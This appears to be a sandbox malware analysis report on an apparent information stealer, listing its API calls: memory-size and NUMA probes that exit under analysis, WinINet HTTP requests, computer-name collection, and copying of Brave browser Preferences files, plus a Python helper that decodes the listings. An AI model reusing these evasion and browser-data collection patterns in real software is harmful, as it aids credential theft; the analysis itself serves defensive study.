• Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                              • Instruction ID: 09296c0490717566420218e3e72328f127d01a86ac434bbd3c7aa25c8eac9feb
                              • Opcode Fuzzy Hash: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                              • Instruction Fuzzy Hash: 613170B1D082099FCB05CFB889899EFBFBCEF58714F100169E605F7650E6349A408BA5

Control-flow Graph (graph image not reproduced)

Function at 0x394bc0: a short loop at 0x394bd0, then a single block (0x394bd7-0x394c48) with three ??2@YAPAXI@Z allocations, lstrlen, InternetCrackUrlA and a call to 392a20.
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00394BF7
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C01
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C0B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 00394C1F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 00394C27
Memory Dump Source
• Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                              • Instruction ID: 8a7d6a641b0e096cf79eebf5dcd3da70bf3e55bf52ca2a3a9dac998865c28d12
                              • Opcode Fuzzy Hash: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                              • Instruction Fuzzy Hash: 49011B71D00218AFDB10DFA8E845B9EBBA8AB18324F00416AF954E7290EB7459058BD4

Control-flow Graph (graph image not reproduced)

Function at 0x391030: GetCurrentProcess and VirtualAllocExNuma at entry; one branch goes to ExitProcess at 0x391057, the other to VirtualAlloc at 0x39105e, followed by VirtualFree at 0x39108a on one path and the return block at 0x3910b1.
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                              • ExitProcess.KERNEL32 ref: 00391058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
Memory Dump Source
• Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                              • Instruction ID: 91e0d5a3d5508656af8e3fbc2c3915dd4a6fbf71f7478b4d903b8c7a5f424f66
                              • Opcode Fuzzy Hash: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                              • Instruction Fuzzy Hash: 6301F471780204BFEB204A656C1EF6B7BADA794B05F208018F708F73C0D9B2E904A664
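The API listings for the WinINet routine at 0x396c40 and the allocation routine at 0x391030 above are easier to read once the numeric arguments are mapped back to their SDK names and each function is checked for the probe-then-ExitProcess shape that the report's sandbox-detection signatures describe. The Python script below does that over lines copied from those two listings. It is an added example written for this page, not Joe Sandbox code and not code recovered from the sample. Its constant tables cover only the arguments that occur in this trace, the 256 MiB "large allocation" threshold is an assumption chosen for the illustration, and the pairing rule (a probe API and ExitProcess in the same function) is a heuristic, not a Joe Sandbox signature.

```python
"""Decode Joe Sandbox 'APIs' listing lines and flag probe-then-exit patterns.

Added example for this report page: not Joe Sandbox code and not code from the
analysed sample. Sample lines are copied from the listings on this page; the
constant tables come from the Windows SDK headers and cover only this trace.
"""
import re
from dataclasses import dataclass

# A listing line looks like either of:
#   • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00396DA5
#   • ExitProcess.KERNEL32 ref: 00391058
API_RE = re.compile(
    r"^[•*-]?\s*(?P<name>[^.\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")   # 32-bit values, sometimes printed signed

# (API name, zero-based argument index) -> enum values worth naming.
ENUMS = {
    ("InternetOpenA", 1): {0: "INTERNET_OPEN_TYPE_PRECONFIG",
                           1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"},
    ("InternetConnectA", 5): {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"},
    ("InternetSetOptionA", 1): {31: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("HttpQueryInfoA", 1): {19: "HTTP_QUERY_STATUS_CODE"},
}
# (API name, argument index) -> bit flags to expand.
FLAGS = {
    ("VirtualAlloc", 2): {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"},
    ("VirtualAlloc", 3): {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"},
    ("VirtualFree", 2): {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"},
}
SIZE_ARG = {"VirtualAlloc": 1, "VirtualAllocEx": 2, "VirtualAllocExNuma": 2}
PROBE_APIS = {"VirtualAllocExNuma", "GlobalMemoryStatusEx"}  # probes seen in this report
BIG_ALLOC = 256 * 1024 * 1024  # assumed threshold for a memory-size probe (illustrative)


@dataclass
class Call:
    name: str
    module: str
    args: list   # int for hex values, str for '?', 'GET', 'ERROR', ...
    ref: int     # address of the call site


def parse_arg(tok: str):
    tok = tok.strip()
    if HEX_RE.match(tok):
        return int(tok, 16) & 0xFFFFFFFF   # '-00400100' -> 0xFFBFFF00
    return tok


def parse_trace(lines):
    """Parse listing lines; lines that are not API entries are ignored."""
    calls = []
    for line in lines:
        m = API_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def describe(call: Call) -> str:
    """Render a call with known enum values and flag bits named."""
    parts = []
    for i, a in enumerate(call.args):
        if not isinstance(a, int):
            parts.append(a)
            continue
        sym = ENUMS.get((call.name, i), {}).get(a)
        if sym is None and (call.name, i) in FLAGS:
            sym = "|".join(s for bit, s in FLAGS[(call.name, i)].items() if a & bit) or None
        parts.append(f"0x{a:08X}" + (f" ({sym})" if sym else ""))
    return f"{call.name}({', '.join(parts)}) @ 0x{call.ref:08X}"


def find_probes(calls) -> list:
    """Heuristics for the probe-then-ExitProcess shape visible in the graphs above."""
    names = {c.name for c in calls}
    findings = []
    if "ExitProcess" in names:
        for api in sorted(PROBE_APIS & names):
            findings.append(f"{api} shares a function with ExitProcess: environment probe")
    for c in calls:
        i = SIZE_ARG.get(c.name)
        if i is not None and i < len(c.args) and isinstance(c.args[i], int) and c.args[i] >= BIG_ALLOC:
            findings.append(f"{c.name} @ 0x{c.ref:08X} requests {c.args[i]:,} bytes: memory-size probe")
    return findings


# Lines copied from the listings on this page (functions 0x396c40 and 0x391030).
SAMPLE_C2 = [
    "• InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396CD5",
    "• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00396D15",
    "• HttpOpenRequestA.WININET(00000000,GET,?,00F2F4A8,00000000,00000000,-00400100,00000000), ref: 00396D50",
    "• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00396D77",
    "• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00396D86",
    "• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00396DA5",
    "• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00396DFF",
]
SAMPLE_PROBE = [
    "• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046",
    "• VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D",
    "• ExitProcess.KERNEL32 ref: 00391058",
    "• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C",
    "• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB",
]

if __name__ == "__main__":
    for c in parse_trace(SAMPLE_C2 + SAMPLE_PROBE):
        print(describe(c))
    for f in find_probes(parse_trace(SAMPLE_PROBE)):
        print("!", f)
```

On the copied lines the script names InternetOpenA's access type (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA's service (INTERNET_SERVICE_HTTP), InternetSetOptionA's option 0x1F (INTERNET_OPTION_SECURITY_FLAGS) and HttpQueryInfoA's 0x13 (HTTP_QUERY_STATUS_CODE), and it reports VirtualAlloc requesting 0x17C841C0 = 399,000,000 bytes with MEM_COMMIT|MEM_RESERVE and PAGE_READWRITE next to VirtualAllocExNuma sharing a function with ExitProcess. The dwFlags value the report prints as -00400100 is normalised to the 32-bit value 0xFFBFFF00 and left undecoded. GetCurrentProcess takes no parameters, so the five values on its line are what was already on the stack, namely the remaining VirtualAllocExNuma arguments (address 0, size 0x7D0, 0x3000, 0x40, node 0); the script prints them raw rather than guessing at their owner.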

Control-flow Graph (graph image not reproduced)

Function at 0x3aee90: a call to 392930 (with lstrcpy on a side branch), a call to 396c40, then StrCmpCA; one branch calls 392a20 and 392930 and may lstrcpy, the other runs a loop at 0x3aef20 followed by 392930; both end in ten calls to 392a20 at 0x3aef45-0x3aefa0.
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEEC3
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AEEDE
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AEF3F
Memory Dump Source
• Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                              • Instruction ID: c425b5ea538a1cc0520abeefedd45a324ad7f0652d599a4f2ebf2c9ea4764161
                              • Opcode Fuzzy Hash: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                              • Instruction Fuzzy Hash: 1221FF31621606AFCF27BF79D84AA9F37A4EF11300F055428B84ADF252DE30DC248794

Control-flow Graph (graph image not reproduced)

Function at 0x3910c0: a short prologue, then GlobalMemoryStatusEx at 0x3910de; one branch goes to ExitProcess at 0x391112, the other passes through comparisons at 0x3910f5-0x391110 that either also reach ExitProcess or return at 0x39111a.
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                              • Instruction ID: 9b385c6f48681c46c23bde60d4bf7679efdcc65c78e5f80f2798b4ca10fb0634
                              • Opcode Fuzzy Hash: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                              • Instruction Fuzzy Hash: 61F05C701183476BEF516A64DC0E72FF7D8EB10350F100929DE9BE2280E230C840D127

                              Control-flow Graph (rendered figure, not reproduced; legend: Executed / Not Executed; basic blocks 3a8c88-3a8eef with calls to StrCmpCA, lstrlen, lstrcpy, ExitProcess and the subroutines at 392a20 and 392930)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                              • Instruction ID: 49e27ab6be9d79dbe844e9ec9b6a8c83e72dba8ea5662480c53fe2cd5f4451f3
                              • Opcode Fuzzy Hash: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                              • Instruction Fuzzy Hash: 74E0922940424AEFC7119FB98C6CD82FBA9EF5A300B450999E6006F650D630FC85D7A6

                              Control-flow Graph (rendered figure, not reproduced; legend: Executed / Not Executed; basic blocks 3b2ad0-3b2b59 with calls to GetProcessHeap, RtlAllocateHeap and GetComputerNameA)
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2AFF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2B06
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 003B2B1A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                              • Instruction ID: 325ce86a65605f4903ea1a465e65fe4d29faa76375e27547d0ad693a06032e46
                              • Opcode Fuzzy Hash: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                              • Instruction Fuzzy Hash: 6001D676A44608AFC710CF99EC49BDEF7B8F744B21F00026AFA19E3780D774590487A1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                              • ExitProcess.KERNEL32 ref: 00391058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                              • Instruction ID: 5fb8650d64a7433bd10965f34c9240f99d74fbe47c1f8b86c63a6a1ab4ea98d3
                              • Opcode Fuzzy Hash: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                              • Instruction Fuzzy Hash: 73E0EC70248345BFE62157A59C8EF167FACAF52B01F144845F205FB0D1D6A5B404EB65
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                              • lstrlen.KERNEL32(\*.*), ref: 003A240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                              • Instruction ID: 4accb0b2269c2a90400a434b90588b3556c206969f4d8b6ac51be5658c7b14bf
                              • Opcode Fuzzy Hash: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                              • Instruction Fuzzy Hash: 4BA25C31912A16AFCB22AF69DC89EAF77B9EF15700F064168F806E7251DB34DD05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                              • lstrcat.KERNEL32(00000000), ref: 00391776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003917EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003917F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391825
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391875
                              • lstrcat.KERNEL32(00000000), ref: 0039187F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003918AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                              • lstrlen.KERNEL32(003C1794), ref: 00391909
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391929
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391935
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039195B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391966
                              • lstrlen.KERNEL32(\*.*), ref: 00391971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039198E
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 0039199A
                                • Part of subcall function 003B4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 003B406D
                                • Part of subcall function 003B4040: lstrcpy.KERNEL32(00000000,?), ref: 003B40A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003919C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391A0E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391A16
                              • lstrlen.KERNEL32(003C1794), ref: 00391A21
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A41
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391A4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A76
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391A81
                              • lstrlen.KERNEL32(003C1794), ref: 00391A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391AAC
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391AB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391ADE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391AE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391B11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00391B45
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 00391B70
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 00391B8A
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391BC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391BFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391C03
                              • lstrlen.KERNEL32(003C1794), ref: 00391C0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C31
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391C3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391C74
                              • lstrlen.KERNEL32(003C1794), ref: 00391C7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CA2
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391CAE
                              • lstrlen.KERNEL32(?), ref: 00391CBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00391CE9
                              • lstrlen.KERNEL32(003C1794), ref: 00391CF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391D14
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391D20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391D51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391DE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391DEB
                              • lstrlen.KERNEL32(003C1794), ref: 00391DF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E19
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391E56
                              • lstrlen.KERNEL32(003C1794), ref: 00391E61
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391E81
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E8D
                              • lstrlen.KERNEL32(?), ref: 00391E9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EBA
                              • lstrcat.KERNEL32(00000000,?), ref: 00391EC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391F3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00391F45
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                              • lstrlen.KERNEL32(00F28A28), ref: 00391FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                              • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                              • lstrlen.KERNEL32(003C1794), ref: 00392058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                              • Instruction ID: dd5b51f2e0ed7f9c1e467a6ba917308ba3be589c513f201c384b9c29a1afc4e0
                              • Opcode Fuzzy Hash: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                              • Instruction Fuzzy Hash: 56925B31912A1BAFCF23AFA4DD89EAF77B9AF54700F054124F805AB251DB349D15CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                              • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                              • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                              • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                              • lstrlen.KERNEL32(?), ref: 0039DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                              • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                              • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                              • lstrlen.KERNEL32(00F28A78), ref: 0039DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                              • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                              • lstrlen.KERNEL32(00F28A78), ref: 0039E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                              • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                              • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                              • lstrlen.KERNEL32(00F28A28), ref: 0039E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                              • lstrcat.KERNEL32(00000000,00F28A28), ref: 0039E269
                              • lstrlen.KERNEL32(\Brave\Preferences), ref: 0039E274
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E29B
                              • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0039E2A7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E2CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E30F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E349
                              • DeleteFileA.KERNEL32(?), ref: 0039E381
                              • StrCmpCA.SHLWAPI(?,00F2D960), ref: 0039E3AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E3F4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E41C
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E445
                              • StrCmpCA.SHLWAPI(?,00F28A78), ref: 0039E468
                              • StrCmpCA.SHLWAPI(?,00F28BB8), ref: 0039E47D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E4D9
                              • GetFileAttributesA.KERNEL32(00000000), ref: 0039E4E0
                              • StrCmpCA.SHLWAPI(?,00F2D8E8), ref: 0039E58E
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E5C4
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E639
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E678
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E6A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E6C7
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E70E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E737
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E75C
